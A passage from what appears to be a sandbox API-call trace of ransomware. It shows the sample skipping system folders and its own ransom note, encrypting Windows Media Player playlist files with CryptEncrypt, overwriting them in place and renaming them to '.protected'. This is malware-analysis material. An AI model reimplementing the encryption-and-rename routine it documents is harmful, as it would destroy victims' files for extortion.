(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0085.033] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Windows") returned -1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0085.033] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0085.033] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.033] StrStrIW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0085.033] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.034] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0085.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.034] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0085.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 138 [0085.034] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0085.034] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0085.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.035] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0085.036] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.036] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.036] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.036] CloseHandle (hObject=0x158) returned 1 [0085.036] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected") returned 148 [0085.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.protected")) returned 1 [0085.037] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Windows") returned -1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0085.037] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0085.037] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.037] StrStrIW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0085.037] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.037] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.037] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.038] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0085.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.038] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0085.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0085.038] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0085.038] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0085.039] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.039] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0085.039] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.039] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.040] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.040] CloseHandle (hObject=0x158) returned 1 [0085.040] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected") returned 150 [0085.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.protected")) returned 1 [0085.041] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.041] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.041] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.041] StrStrIW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.041] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.042] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.042] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0085.042] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.042] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0085.043] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.043] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0085.044] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.044] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.044] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.044] CloseHandle (hObject=0x158) returned 1 [0085.044] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected") returned 145 [0085.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.protected")) returned 1 [0085.045] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Windows") returned -1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files") returned -1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files (x86)") returned -1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="$Recycle.bin") returned 1 [0085.045] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="System Volume Information") returned -1 [0085.045] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.045] StrStrIW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".protected") returned 0x0 [0085.045] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.045] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.046] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0085.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.046] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".rar") returned 0x0 [0085.046] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0085.046] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".zip") returned 0x0 [0085.046] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0085.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.047] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0085.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.047] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.047] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.048] CloseHandle (hObject=0x158) returned 1 [0085.048] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected") returned 146 [0085.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.protected")) returned 1 [0085.048] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.048] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.049] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.049] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrIW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.049] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.049] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.049] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0085.049] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.049] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0085.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.051] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0085.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.051] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, 